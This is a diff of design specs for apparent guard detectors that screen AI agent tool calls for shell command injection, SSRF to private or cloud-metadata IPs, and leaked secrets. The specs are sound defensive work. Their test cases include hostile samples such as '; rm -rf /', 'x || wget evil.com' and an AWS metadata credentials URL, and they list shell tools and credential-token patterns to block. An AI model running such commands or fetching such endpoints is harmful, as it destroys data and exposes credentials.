+### D3: Newlines are unconditionally flagged
+
+**Decision:** A literal `\n` character embedded in a tool call string parameter value triggers the detector.  
+**Why:** MCP tool call parameters are JSON string values. A literal newline inside a JSON string is unusual and, in shell contexts, can break out of quoting. This is aggressive but the FP risk is very low — JSON serialization typically uses `\n` escape sequences, not literal newline bytes. If real-world FPs emerge, this can be narrowed to "newline followed by known command."
+
+### D4: Copy `_extract_strings`, don't refactor yet
+
+**Decision:** Third copy of the recursive string extractor.  
+**Why:** All five detectors need it. Extracting to `detectors/_util.py` is the right eventual cleanup, but doing it now means touching `sql_injection.py` and `path_traversal.py` (which are done and tested). Refactor after all five detectors ship.
+
+### D5: `>>` redirect treated same as `>`
+
+**Decision:** Both `>` and `>>` followed by a path trigger the detector.  
+**Why:** `>>` (append) is just as dangerous as `>` (overwrite) when targeting system files. Same regex handles both.
+
+---
+
+## 8. Evaluation Mapping
+
+| Eval scenario | Detector behavior |
+|--------------|-------------------|
+| A4 (`;` rm -rf /) | Blocked by `_SEMICOLON_CMD` |
+| B6 (read multiple files, no sensitive content) | Not triggered — no shell metacharacters |
+| B8 (file with SQL-like content) | Not triggered — SQL keywords aren't shell operators |
+| B9 (file with path-like content like "/usr/bin/python") | Not triggered — path in value without shell operator |
+| B10 (long string params) | Not triggered — length alone doesn't trigger |
+
+---
+
+## 9. Integration Notes
+
+This detector is standalone until Issue #26 (wire detectors into registry + engine). After #23 is done:
+
+- The detector module exists and is importable
+- It's already registered in `detectors/__init__.py` REGISTRY as `"command_injection": "agentgate.detectors.command_injection"`
+- Issue #26 will implement the `run_all()` function that dynamically imports and invokes it
+
+No changes needed to `engine.py`, `proxy.py`, `models.py`, or any other module.
+
+---
+
+## 10. Risks
+
+### Risk 1: FP on legitimate semicolons + common words
+
+If someone passes `"data; source analysis"` where `source` is a known shell command, it would false-positive. This is an edge case — `source` in prose is common, `source` as a shell command is uncommon in injection payloads.
+
+**Mitigation:** If this FP appears in benign tests, remove `source` from the command list. The command list should lean toward commands with unambiguous attack intent (`rm`, `curl`, `wget`, `nc`, `chmod`, `sudo`). Words that double as English words (`find`, `kill`, `export`, `source`, `env`) should be included cautiously — only if the combination with a shell operator is far more likely to be an attack than benign text. Bias toward keeping `find` and `kill` (high attack value), dropping `source` and `export` if FPs emerge.
+
+### Risk 2: Regex ordering and early-exit semantics
+
+If `_OR_CMD` (`||`) is checked after `_PIPE_CMD` (`|`), a `||` sequence could match the single-pipe pattern first. The `_PIPE_CMD` regex must use a negative lookbehind for `|` to avoid this.
+
+**Mitigation:** The spec already includes `(?<!\|)` in `_PIPE_CMD`. Verify with test case: `"x || wget evil.com"` must match `_OR_CMD`, not `_PIPE_CMD`.
+
+---
+
+## 11. Definition of Done
+
+- [ ] `src/agentgate/detectors/command_injection.py` implements `detect(tool_call: ToolCall) -> DetectorResult`
+- [ ] Uses `_extract_strings` to recursively scan all string parameter values
+- [ ] 8 regex patterns covering shell operators (context-aware), command substitution, and newlines
+- [ ] Returns on first match (short-circuit, same as sql_injection and path_traversal)
+- [ ] `detector_name` is `"command_injection"` in all returned `DetectorResult` objects
+- [ ] `tests/test_detectors/test_command_injection.py` has 17 tests (8 positive, 7 negative, 2 edge)
+- [ ] All 17 tests pass
+- [ ] Zero false positives on the 7 negative cases — this is the hard requirement
+- [ ] All existing tests still pass (no regressions)
+- [ ] Code passes `ruff check` and `ruff format`

--- a/docs/issue-24-ssrf-detector-spec.md
+++ b/docs/issue-24-ssrf-detector-spec.md
@@ -1,0 +1,228 @@
+# Issue #24: SSRF Private IP Detector — Implementation Spec
+
+**Status:** Ready to build  
+**Depends on:** Nothing (standalone detector, no cross-module deps)  
+**Blocked by:** Nothing  
+**Blocks:** #26 (wire detectors into engine)  
+**Estimated effort:** ~2 hours  
+**Acceptance test:** AT-5 (SSRF Private IP Block)
+
+---
+
+## 1. What This Detector Does
+
+Scans all string parameter values in a tool call for URLs or IP-address-like strings that resolve to private, loopback, link-local, or cloud metadata addresses. If found, returns `DetectorResult(matched=True)`. This blocks SSRF attacks where an agent is tricked into hitting internal infrastructure or cloud metadata endpoints.
+
+**This detector is deterministic, regex+stdlib only. No DNS resolution, no network calls, no ML.**
+
+---
+
+## 2. Detection Strategy
+
+### Why not just regex?
+
+Pure regex for IP range matching is fragile and error-prone (e.g., matching `172.16.x.x` through `172.31.x.x` as a regex is ugly and easy to get wrong). Instead:
+
+1. **Extract candidate IPs/hostnames from strings** using a URL parser + bare IP regex fallback.
+2. **Parse extracted IPs** using `ipaddress.ip_address()` from stdlib.
+3. **Check parsed IPs** against stdlib's `is_private`, `is_loopback`, `is_link_local`, `is_reserved` — plus explicit checks for the AWS metadata IP `169.254.169.254` and `0.0.0.0`.
+
+This is more robust than regex-only approaches and handles edge cases like:
+- Decimal IPs (`http://2130706433` = `127.0.0.1`)
+- IPv6 loopback (`http://[::1]/`)
+- Hex-encoded octets (`http://0x7f.0x00.0x00.0x01/`) — handled by attempting parse
+- Ports in URLs (`http://10.0.0.1:8080/path`)
+
+### Extraction approach
+
+For each string value in the tool call arguments:
+
+1. **Try `urllib.parse.urlparse()`** — if the string has a scheme (`http://`, `https://`, `ftp://`, etc.), extract the hostname from the parsed URL.
+2. **Bare IP fallback** — if no URL scheme, check if the string itself looks like a bare IP address (v4 or v6) using a simple regex, then parse it.
+
+This covers:
+- `http://169.254.169.254/latest/meta-data/` → hostname `169.254.169.254`
+- `https://10.0.0.1:8080/admin` → hostname `10.0.0.1`
+- `http://[::1]:3000/` → hostname `::1`
+- `192.168.1.1` (bare string) → parsed directly
+
+### What counts as "private/dangerous"
+
+An extracted IP is flagged if ANY of:
+
+| Check | What it catches |
+|-------|-----------------|
+| `ip.is_private` | `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `fc00::/7` |
+| `ip.is_loopback` | `127.0.0.0/8`, `::1` |
+| `ip.is_link_local` | `169.254.0.0/16` (includes AWS metadata), `fe80::/10` |
+| `ip.is_reserved` | Various reserved ranges |
+| `ip == 0.0.0.0` | Explicit zero-address check (binds all interfaces) |
+| `ip == ::` | IPv6 unspecified |
+
+**Note:** `ipaddress` stdlib's `is_private` in Python 3.11+ covers `0.0.0.0` and most reserved ranges. For Python 3.10 compatibility, add explicit checks for `0.0.0.0` and `::` since `is_private` behavior varies slightly across versions.
+
+### What does NOT get flagged
+
+- Public IPs: `8.8.8.8`, `1.1.1.1`, `151.101.1.69`
+- Public hostnames: `api.github.com`, `example.com` — **no DNS resolution**, so hostnames that might resolve to private IPs are not caught. This is a known MVP limitation (documented, not addressed).
+- Non-URL strings that happen to contain digit sequences: `"order 192 items"` — the bare IP regex requires a full IPv4 dotted-quad pattern to avoid false positives.
+- Strings that don't look like URLs or IPs at all.
+
+---
+
+## 3. Module Contract
+
+### File: `src/agentgate/detectors/ssrf.py`
+
+```python
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for SSRF-dangerous IP addresses.
+    
+    Returns DetectorResult with matched=True on first private/loopback/
+    link-local/metadata IP found in any URL or bare IP string.
+    """
+```
+
+**Inputs:** `ToolCall` (from `models.py`) — uses `tool_call.arguments` dict.  
+**Outputs:** `DetectorResult` — `matched=True` with `detector_name="ssrf_private_ip"` and descriptive `detail`, or `matched=False`.  
+**Side effects:** None. Pure function.  
+**Dependencies:** `urllib.parse`, `ipaddress` (both stdlib), `re`. No third-party deps.
+
+---
+
+## 4. Internal Design
+
+### Helper functions
+
+**`_extract_strings(arguments, prefix="")`** — Reuse the same recursive string extractor from the other detectors. Copy the pattern from `sql_injection.py` / `path_traversal.py` / `command_injection.py`. (Shared extraction is a future refactor; for now, each detector has its own copy per existing convention.)
+
+**`_extract_host_from_url(value: str) -> str | None`** — Attempt to parse the string as a URL. If it has a recognized scheme and a hostname, return the hostname (stripped of brackets for IPv6). Return `None` if not a URL.
+
+**`_is_dangerous_ip(host: str) -> bool`** — Try to parse the host string as an IP address via `ipaddress.ip_address()`. If it parses, check against the private/loopback/link-local/reserved predicates. Return `True` if dangerous. Return `False` if the parse fails (meaning it's a hostname, not an IP) or if the IP is public.
+
+### Detection flow
+
+```
+For each (param_path, string_value) in _extract_strings(arguments):
+    1. host = _extract_host_from_url(value)
+       → if host and _is_dangerous_ip(host): MATCH
+    2. Bare IP fallback: if value matches IPv4_REGEX or IPv6_REGEX:
+       → if _is_dangerous_ip(value): MATCH
+    3. Continue to next string
+Return no-match
+```
+
+### Regex for bare IP fallback
+
+```python
+# IPv4: exactly 4 dotted decimal octets (no trailing path/port)
+_BARE_IPV4_RE = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
+
+# IPv6: starts with brackets or contains colons (simplified)
+_BARE_IPV6_RE = re.compile(r"^\[?[0-9a-fA-F:]+\]?$")
+```
+
+These are intentionally conservative to avoid false positives on non-IP strings.
+
+### Edge cases to handle
+
+| Case | How handled |
+|------|-------------|
+| `http://169.254.169.254/latest/meta-data/iam/security-credentials/` | URL parse → host `169.254.169.254` → link-local → **MATCH** |
+| `http://[::1]:3000/admin` | URL parse → host `::1` (strip brackets) → loopback → **MATCH** |
+| `http://0.0.0.0:8080/` | URL parse → host `0.0.0.0` → explicit check → **MATCH** |
+| `http://2130706433/` | URL parse → host `2130706433` → `ipaddress` parses decimal IPs → `127.0.0.1` → loopback → **MATCH** |
+| `http://0x7f000001/` | URL parse → host `0x7f000001` → `ipaddress` may or may not parse hex; if not, **no match** (acceptable MVP gap) |
+| `ftp://10.0.0.1/file` | URL parse with `ftp` scheme → host `10.0.0.1` → private → **MATCH** |
+| `https://api.github.com/repos` | URL parse → host `api.github.com` → not an IP → `_is_dangerous_ip` returns False → **no match** |
+| `192.168.1.1` (bare string) | No URL scheme → bare IP regex matches → `_is_dangerous_ip` → private → **MATCH** |
+| `"order 192.168 items"` | No URL scheme → bare IP regex does NOT match (not 4 octets) → **no match** |
+| Port in URL: `http://10.0.0.1:9090/` | `urlparse` extracts hostname without port → works correctly |
+| `http://localhost/` | URL parse → host `localhost` → not a valid IP → **no match** (known gap: no DNS) |
+
+**Known MVP gaps (documented, not fixed):**
+- Hostnames that resolve to private IPs (e.g., `http://localhost/`, `http://internal.corp.com/`) — requires DNS resolution, out of scope.
+- Hex-encoded IPs (`0x7f000001`) — `ipaddress` doesn't reliably parse all encoding tricks. Acceptable.
+- Octal-encoded octets (`http://0177.0.0.1/`) — same limitation.
+- URL-encoded IPs in path components (not the host) — out of scope.
+
+---
+
+## 5. Test Plan
+
+### File: `tests/test_detectors/test_ssrf.py`
+
+All tests are sync, no I/O, no network. Each test constructs a `ToolCall` and asserts on the `DetectorResult`.
+
+### Positive cases (8 tests — must all match)
+
+| Test name | Tool call | Why it matters |
+|-----------|-----------|----------------|
+| `test_aws_metadata_endpoint` | `fetch_url(url="http://169.254.169.254/latest/meta-data/iam/security-credentials/")` | AT-5 exact scenario. AWS metadata SSRF. |
+| `test_private_10_network` | `fetch_url(url="http://10.0.0.1/admin")` | Class A private range. |
+| `test_private_172_network` | `fetch_url(url="http://172.16.0.1/internal")` | Class B private range (172.16-31). |
+| `test_private_192_network` | `fetch_url(url="http://192.168.1.1/config")` | Class C private range. |
+| `test_loopback_127` | `fetch_url(url="http://127.0.0.1:8080/")` | Loopback with port. |
+| `test_zero_address` | `fetch_url(url="http://0.0.0.0/")` | Zero address (binds all). |
+| `test_ipv6_loopback` | `fetch_url(url="http://[::1]:3000/")` | IPv6 loopback. |
+| `test_bare_private_ip` | `make_request(target="192.168.1.1")` | Bare IP string, no URL scheme. |
+
+### Negative cases (7 tests — must all NOT match)
+
+| Test name | Tool call | Why it must pass |
+|-----------|-----------|------------------|
+| `test_public_api_url` | `fetch_url(url="https://api.github.com/repos")` | Normal public API. |
+| `test_public_dns_ip` | `fetch_url(url="https://8.8.8.8/dns-query")` | Google DNS — public IP. |
+| `test_public_website` | `fetch_url(url="https://www.example.com/page")` | Hostname, not IP. |
+| `test_non_url_string` | `read_file(path="/data/workspace/report.csv")` | Not a URL at all. |
+| `test_numeric_string_not_ip` | `query(limit="192")` | Number that isn't an IP. |
+| `test_public_ip_bare` | `connect(host="151.101.1.69")` | Public IP, bare string. |
+| `test_empty_arguments` | `ping()` with `{}` arguments | No params to scan. |
+
+### Edge cases (2 tests)
+
+| Test name | Tool call | Expected |
+|-----------|-----------|----------|
+| `test_nested_url_param` | `request(options={"endpoint": "http://10.0.0.1/api"})` | **MATCH** — recursive extraction finds nested URL. |
+| `test_url_with_path_only` | `fetch_url(url="/api/v1/users")` | **No match** — relative path, no host. |
+
+**Total: 17 tests** (8 positive + 7 negative + 2 edge = matches the convention from other detectors which have 16-17 tests each).
+
+---
+
+## 6. Implementation Checklist
+
+- [ ] Create `src/agentgate/detectors/ssrf.py`
+  - [ ] `_extract_strings()` — copy from existing detectors
+  - [ ] `_extract_host_from_url(value)` — `urlparse` + strip IPv6 brackets
+  - [ ] `_is_dangerous_ip(host)` — `ipaddress.ip_address()` + private/loopback/link-local/reserved checks + explicit `0.0.0.0` / `::` checks
+  - [ ] `detect(tool_call)` — main entry point, iterate strings, check URLs then bare IPs
+- [ ] Create `tests/test_detectors/test_ssrf.py` — 17 tests
+- [ ] Run `uv run pytest tests/test_detectors/test_ssrf.py` — all green
+- [ ] Run `uv run ruff check src/agentgate/detectors/ssrf.py tests/test_detectors/test_ssrf.py`
+- [ ] Run full suite `uv run pytest` — no regressions
+
+---
+
+## 7. Decisions Made
+
+| Decision | Rationale |
+|----------|-----------|
+| **Use `ipaddress` stdlib, not regex, for range checking** | Regex for `172.16-31.x.x` is fragile. `ipaddress.is_private` is authoritative and handles IPv6 for free. |
+| **No DNS resolution** | Adding DNS makes the detector async, adds latency, introduces network dependencies, and creates TOCTOU issues. MVP gap, documented. |
+| **Copy `_extract_strings` rather than refactor to shared util** | Matches existing detector convention. Refactor to shared util is a future cleanup, not blocking. |
+| **Check `is_reserved` in addition to `is_private`** | Catches ranges like `100.64.0.0/10` (carrier-grade NAT) and documentation ranges. Slightly broader than spec requires, but no false-positive risk on legitimate public IPs. |
+| **Bare IP regex is conservative (full dotted-quad only)** | Avoids false positives on strings like `"192 items"` or `"version 10.0"`. Misses exotic encodings — acceptable. |
+| **`localhost` hostname is NOT flagged** | Would require either DNS or hardcoded hostname list. Hardcoding `localhost` is tempting but opens the door to `internal.corp`, `metadata.google.internal`, etc. — slippery slope. Clean boundary: IP addresses only. |
+
+---
+
+## 8. What This Does NOT Do
+
+- **No hostname resolution.** `http://localhost/`, `http://metadata.google.internal/` are not caught.
+- **No hex/octal IP encoding tricks.** `0x7f000001`, `0177.0.0.1` may not parse.
+- **No response inspection.** This checks outbound tool call parameters only.
+- **No rate awareness.** Repeated SSRF attempts aren't escalated.
+- **No allowlist for "known safe" internal IPs.** Every private IP is blocked. If a user legitimately needs to hit a private IP via a tool, they disable the `ssrf_private_ip` detector in their policy YAML.
+
+All of these are v1 or expansion scope.

--- a/docs/issue-25-secrets-detector-spec.md
+++ b/docs/issue-25-secrets-detector-spec.md
@@ -1,0 +1,234 @@
+# Issue #25: `secrets_in_params` Detector — Implementation Spec
+
+**Status:** Ready to build  
+**Depends on:** None (parallel with #21–#24)  
+**Blocks:** #26 (wire detectors into engine)  
+**Ref:** MVP Spec §3 (detector table), §6 AT-2, §2 S2, §11 Risk 2  
+
+---
+
+## 1. What This Does
+
+Scans every string value in a tool call's `arguments` dict (recursively, including nested dicts and lists) for credential and secret patterns. Returns `DetectorResult(matched=True)` on the first match.
+
+This is the detector behind acceptance test AT-2 (credential exfiltration block) and success criterion S2 ("zero credential/secret values pass through tool call arguments when the `secrets_in_params` detector is enabled").
+
+---
+
+## 2. Exact Patterns
+
+Seven pattern categories covering the highest-value secret types. All patterns use exact-format regexes to minimize false positives (Spec Risk 2). No broad alphanumeric matchers.
+
+### Category 1: AWS Access Keys
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| AWS Access Key ID | `AKIA[0-9A-Z]{16}` | Always starts with `AKIA`, exactly 20 chars total |
+| AWS Secret Access Key candidate | `(?:aws_secret_access_key\|aws_secret_key\|AWS_SECRET_ACCESS_KEY)\s*[=:]\s*\S+` | Key name + assignment, not standalone base64 strings |
+
+**Design choice:** Only flag `AKIA...` standalone (it's a unique prefix with zero legitimate non-AWS uses). For secret keys, require the key name prefix to avoid false positives on arbitrary base64 strings.
+
+### Category 2: GitHub Tokens
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| GitHub PAT (classic) | `ghp_[A-Za-z0-9]{36}` | Fine-grained and classic PATs |
+| GitHub OAuth token | `gho_[A-Za-z0-9]{36}` | OAuth access tokens |
+| GitHub App server token | `ghs_[A-Za-z0-9]{36}` | Server-to-server tokens |
+| GitHub App user token | `ghu_[A-Za-z0-9]{36}` | User-to-server tokens |
+| GitHub fine-grained PAT | `github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}` | Newer format with underscore separator |
+
+**Implementation:** Single combined pattern: `(?:ghp_|gho_|ghs_|ghu_)[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}`
+
+### Category 3: Private Keys (PEM)
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| PEM private key header | `-----BEGIN\s+(?:RSA\s+|DSA\s+|EC\s+|OPENSSH\s+|ENCRYPTED\s+)?PRIVATE\s+KEY-----` | Covers RSA, DSA, EC, OpenSSH, and encrypted PEM formats |
+
+**Design choice:** Match on the `BEGIN...PRIVATE KEY` header line. This is the standard PEM envelope and has zero legitimate non-key uses in tool call parameters.
+
+### Category 4: Generic Password Assignment
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| Password/secret assignment | `(?:password\|passwd\|pwd\|secret\|api_key\|apikey\|api_secret\|access_token\|auth_token)\s*[=:]\s*\S+` | Key name followed by `=` or `:` and a non-whitespace value |
+
+**Design choice:** Require `key=value` format. Do NOT flag the word "password" alone — that would hit every password reset email, documentation string, and UI label. The `=` or `:` operator is the signal that a credential is being transmitted, not just mentioned.
+
+### Category 5: Slack Tokens
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| Slack bot/user/workspace token | `xox[bpors]-[A-Za-z0-9-]{10,}` | Covers `xoxb-`, `xoxp-`, `xoxo-`, `xoxr-`, `xoxs-` |
+
+### Category 6: Generic API Key Header Values
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| Bearer token in header value | `Bearer\s+[A-Za-z0-9\-._~+/]+=*` | Authorization header values being passed as params |
+
+### Category 7: Stripe Keys
+
+| Pattern | Regex | Notes |
+|---------|-------|-------|
+| Stripe secret/publishable key | `(?:sk\|pk)_(?:live\|test)_[A-Za-z0-9]{24,}` | Stripe API keys |
+
+---
+
+## 3. What NOT to Flag
+
+These are explicit false-positive exclusions to test against:
+
+- The word "password" in normal text (e.g., "Please reset your password")
+- Short alphanumeric strings (e.g., `abc123`, `token`, `key`)
+- Strings that look key-like but don't match exact format (e.g., `AKID1234` — wrong prefix)
+- Base64-encoded data without a key prefix (e.g., `aGVsbG8gd29ybGQ=`)
+- UUIDs (e.g., `550e8400-e29b-41d4-a716-446655440000`)
+- Normal email addresses
+- File paths that happen to contain "key" (e.g., `/data/workspace/key-metrics.csv`)
+
+---
+
+## 4. Implementation
+
+### File: `src/agentgate/detectors/secrets.py`
+
+**Structure:** Follow the exact pattern established by `sql_injection.py`, `path_traversal.py`, `command_injection.py`, and `ssrf.py`:
+
+1. `_extract_strings(arguments, prefix)` — recursive string extraction (copy from existing detectors, or factor out into a shared utility later in #26)
+2. `_SECRET_PATTERNS: list[tuple[re.Pattern[str], str]]` — compiled regex + label pairs
+3. `detect(tool_call: ToolCall) -> DetectorResult` — iterate strings, iterate patterns, return on first match
+
+**Key decisions:**
+
+- All regexes use `re.IGNORECASE` for the password/secret assignment patterns only. AWS keys and GitHub tokens are case-sensitive by format — do NOT use `re.IGNORECASE` on those.
+- Use `re.search()` (not `re.match()`) — secrets can appear anywhere in a string value, not just at the start.
+- Short-circuit on first match (same as all other detectors).
+- `detector_name` in result: `"secrets_in_params"`
+
+### Pattern list (implementation order)
+
+```python
+_SECRET_PATTERNS: list[tuple[re.Pattern[str], str]] = [
+    # AWS Access Key ID (case-sensitive, exact format)
+    (re.compile(r"AKIA[0-9A-Z]{16}"), "AWS access key ID"),
+
+    # AWS Secret Key assignment (case-insensitive key name)
+    (re.compile(
+        r"(?:aws_secret_access_key|aws_secret_key|AWS_SECRET_ACCESS_KEY)"
+        r"\s*[=:]\s*\S+", re.IGNORECASE
+    ), "AWS secret access key assignment"),
+
+    # GitHub tokens (case-sensitive prefix, exact format)
+    (re.compile(r"(?:ghp_|gho_|ghs_|ghu_)[A-Za-z0-9]{36}"), "GitHub token"),
+    (re.compile(r"github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}"), "GitHub fine-grained PAT"),
+
+    # PEM private key header
+    (re.compile(
+        r"-----BEGIN\s+(?:RSA\s+|DSA\s+|EC\s+|OPENSSH\s+|ENCRYPTED\s+)?PRIVATE\s+KEY-----"
+    ), "PEM private key"),
+
+    # Generic password/secret assignment (case-insensitive)
+    (re.compile(
+        r"(?:password|passwd|pwd|secret|api_key|apikey|api_secret|access_token|auth_token)"
+        r"\s*[=:]\s*\S+", re.IGNORECASE
+    ), "password/secret assignment"),
+
+    # Slack tokens
+    (re.compile(r"xox[bpors]-[A-Za-z0-9\-]{10,}"), "Slack token"),
+
+    # Bearer token
+    (re.compile(r"Bearer\s+[A-Za-z0-9\-._~+/]+=*"), "Bearer authorization token"),
+
+    # Stripe keys
+    (re.compile(r"(?:sk|pk)_(?:live|test)_[A-Za-z0-9]{24,}"), "Stripe API key"),
+]
+```
+
+---
+
+## 5. Test Plan
+
+### File: `tests/test_detectors/test_secrets.py`
+
+Follow the established pattern from other detector test files: 16–17 tests organized as positive, negative, and edge cases. All tests are sync, no I/O.
+
+### Positive Cases (8 tests — must all match)
+
+| # | Test name | Input | Why it matters |
+|---|-----------|-------|----------------|
+| P1 | `test_aws_access_key_id` | `{"body": "key is AKIA1234567890ABCDEF"}` | Exact AT-2 scenario from spec |
+| P2 | `test_github_pat_classic` | `{"token": "ghp_aBcDeFgHiJkLmNoPqRsTuVwXyZ012345"}` | Classic GitHub PAT format |
+| P3 | `test_github_fine_grained_pat` | `{"auth": "github_pat_<22chars>_<59chars>"}` | Newer GitHub PAT format |
+| P4 | `test_rsa_private_key` | `{"data": "-----BEGIN RSA PRIVATE KEY-----\nMIIE..."}` | PEM key header in body |
+| P5 | `test_generic_private_key` | `{"data": "-----BEGIN PRIVATE KEY-----\nMIIE..."}` | PKCS#8 format (no algorithm prefix) |
+| P6 | `test_password_assignment` | `{"config": "database_password=hunter2"}` | Password in config string |
+| P7 | `test_secret_in_nested_param` | `{"outer": {"inner": "api_key=sk_12345"}}` | Recursive extraction works |
+| P8 | `test_slack_token` | `{"webhook": "xoxb-1234-5678-abcdefghij"}` | Slack bot token |
+
+### Negative Cases (7 tests — must all NOT match)
+
+| # | Test name | Input | Why it must not fire |
+|---|-----------|-------|---------------------|
+| N1 | `test_normal_business_text` | `{"body": "Please review the Q4 sales report"}` | Normal text, no secrets |
+| N2 | `test_word_password_in_prose` | `{"body": "Please reset your password at the portal"}` | "password" without `=`/`:` assignment |
+| N3 | `test_short_alphanumeric` | `{"token": "abc123"}` | Too short, no prefix match |
+| N4 | `test_wrong_aws_prefix` | `{"key": "AKID1234567890ABCDEF"}` | Wrong prefix (`AKID` not `AKIA`) |
+| N5 | `test_uuid_not_flagged` | `{"id": "550e8400-e29b-41d4-a716-446655440000"}` | UUID looks key-like but isn't |
+| N6 | `test_file_path_with_key` | `{"path": "/data/workspace/key-metrics.csv"}` | "key" in a file path is not a secret |
+| N7 | `test_base64_without_prefix` | `{"data": "aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q="}` | Raw base64 should not trigger |
+
+### Edge Cases (2 tests)
+
+| # | Test name | Input | Expected |
+|---|-----------|-------|----------|
+| E1 | `test_aws_key_in_url` | `{"url": "https://s3.amazonaws.com/?AWSAccessKeyId=AKIA1234567890ABCDEF"}` | Match — key embedded in URL param |
+| E2 | `test_empty_arguments` | `{}` | No match — empty arguments should not error |
+
+**Total: 17 tests** (matching the count of other detector test files).
+
+---
+
+## 6. Acceptance Criteria
+
+- [ ] `detect()` returns `DetectorResult(matched=True, detector_name="secrets_in_params", detail=...)` for all 8 positive test cases
+- [ ] `detect()` returns `DetectorResult(matched=False, detector_name="secrets_in_params")` for all 7 negative test cases
+- [ ] Both edge cases pass
+- [ ] All 17 tests pass with `uv run pytest tests/test_detectors/test_secrets.py`
+- [ ] Zero false positives on the 10 benign evaluation scenarios (B1–B10) from Spec §12 when this detector is enabled — specifically B8 ("Read file with SQL-like content") and B9 ("Read file with path-like content") should not trigger this detector
+- [ ] `detector_name` field is exactly `"secrets_in_params"` (matches the registry key in `detectors/__init__.py`)
+- [ ] Detail string includes which pattern category matched (e.g., "AWS access key ID", "GitHub token")
+
+---
+
+## 7. What This Does NOT Do
+
+- **Does not scan tool responses.** MVP inspects outbound tool call arguments only. Response scanning is deferred to v1.
+- **Does not redact or mask secrets.** Decision is binary allow/block. No `modify` action in v0.
+- **Does not check environment variables.** Only scans the `arguments` dict of the `ToolCall`.
+- **Does not do entropy-based detection.** No Shannon entropy calculation. Deterministic regex patterns only.
+- **Does not cover all secret types.** Deliberately limited to the highest-value, lowest-false-positive patterns. Google Cloud keys, Azure keys, JWT tokens, etc. are v1 additions.
+
+---
+
+## 8. Risk
+
+**Primary risk:** False positives on the `password=` pattern in normal text. A tool call with `{"query": "SELECT * FROM users WHERE password='reset'"}` contains `password=` followed by a value.
+
+**Mitigation:** The regex requires `\s*[=:]\s*\S+` after the keyword. The SQL example above uses `='reset'` which *will* match. This is an acceptable trade-off — the SQL injection detector would independently catch the destructive SQL, and a `password=` pattern in a tool call argument is almost always a real credential being transmitted. If this causes benign-scenario failures, narrow the regex to require at least 8 chars after `=`/`:` — but don't do this preemptively.
+
+**Secondary risk:** Regex performance on very long string values. Mitigated by the fact that all patterns use anchored or prefix-specific matching — no catastrophic backtracking possible.
+
+---
+
+## 9. Implementation Sequence
+
+1. Copy `_extract_strings` from any existing detector (all four have identical implementations)
+2. Define `_SECRET_PATTERNS` list with all 9 compiled regex/label pairs
+3. Implement `detect()` — identical structure to `sql_injection.detect()`
+4. Write all 17 tests
+5. Run tests: `uv run pytest tests/test_detectors/test_secrets.py -v`
+6. Confirm no ruff lint issues: `uv run ruff check src/agentgate/detectors/secrets.py tests/test_detectors/test_secrets.py`
+
+Estimated time: 30–45 minutes. This is a mechanical detector with well-understood patterns.

--- a/docs/issue-26-spec.md
+++ b/docs/issue-26-spec.md
@@ -1,0 +1,235 @@
+# Issue #26 — Wire Detectors into Registry + Engine Pipeline
+
+**Status:** Implementation-ready  
+**Depends on:** #21 ✅, #22 ✅, #23 ✅, #24 ✅, #25 ✅  
+**Blocks:** #15 (acceptance tests)  
+**Estimated effort:** ~2 hours  
+
+---
+
+## 1. What This Issue Does
+
+Connects the 5 implemented detectors (`sql_injection`, `path_traversal`, `command_injection`, `ssrf`, `secrets`) into a working pipeline, and wires that pipeline into the engine's decision stack as Step 1 (highest precedence, not overridable by policy rules).
+
+After this issue, a tool call containing a path traversal payload will be blocked by the engine *before* any policy rules are evaluated — even if no policy file is loaded.
+
+---
+
+## 2. Scope
+
+### In scope
+
+- Implement `run_all()` in `detectors/__init__.py`
+- Add Step 1 (detector invocation) to `engine.evaluate()`
+- Integration tests proving the full pipeline works end-to-end
+
+### Out of scope
+
+- Chain detection (Issue #11 — separate detector, separate wiring path through session store)
+- Detector configuration beyond boolean enable/disable (no per-detector thresholds, no custom patterns)
+- Any changes to detector logic itself (those are locked in #21–#25)
+- Audit logging of detector matches (Issue #12)
+
+---
+
+## 3. Changes Required
+
+### 3.1 `src/agentgate/detectors/__init__.py` — Implement `run_all()`
+
+**Current state:** `REGISTRY` dict maps 5 detector names to module paths. `run_all()` raises `NotImplementedError`.
+
+**Target state:** `run_all()` imports each enabled detector module, calls `detect(tool_call)`, collects results.
+
+**Design decisions:**
+
+| Decision | Choice | Rationale |
+|----------|--------|-----------|
+| Import strategy | Eager imports at module level, not lazy `importlib` | All 5 detectors are always available. Lazy import adds complexity for zero benefit — there's no plugin system in MVP. The `REGISTRY` dict with module path strings was scaffolding; replace with direct imports. |
+| Return value | List of `DetectorResult` where `matched=True` only | Caller (engine) needs to know *which* detectors fired and *why*. Returning only matched results keeps the list short and avoids the engine filtering. |
+| Short-circuit? | No — run all enabled detectors, return all matches | The engine will block on the *first* match regardless, but returning all matches is valuable for audit logging (#12) and for the user to see the full picture. Cost is negligible (5 regex scans over the same params). |
+| Error handling | If a detector raises, log warning and skip it — don't crash the proxy | A regex bug in one detector shouldn't take down the entire pipeline. Log the exception, continue to next detector. |
+
+**Implementation sketch:**
+
+```python
+from __future__ import annotations
+
+import logging
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from agentgate.models import DetectorResult, ToolCall
+
+from agentgate.detectors import (
+    command_injection,
+    path_traversal,
+    secrets,
+    sql_injection,
+    ssrf,
+)
+
+log = logging.getLogger("agentgate.detectors")
+
+# Maps config field name -> detector module
+_DETECTORS: dict[str, object] = {
+    "sql_injection": sql_injection,
+    "path_traversal": path_traversal,
+    "command_injection": command_injection,
+    "ssrf_private_ip": ssrf,
+    "secrets_in_params": secrets,
+}
+
+
+def run_all(tool_call: ToolCall, enabled: dict[str, bool]) -> list[DetectorResult]:
+    results: list[DetectorResult] = []
+    for name, module in _DETECTORS.items():
+        if not enabled.get(name, False):
+            continue
+        try:
+            result = module.detect(tool_call)
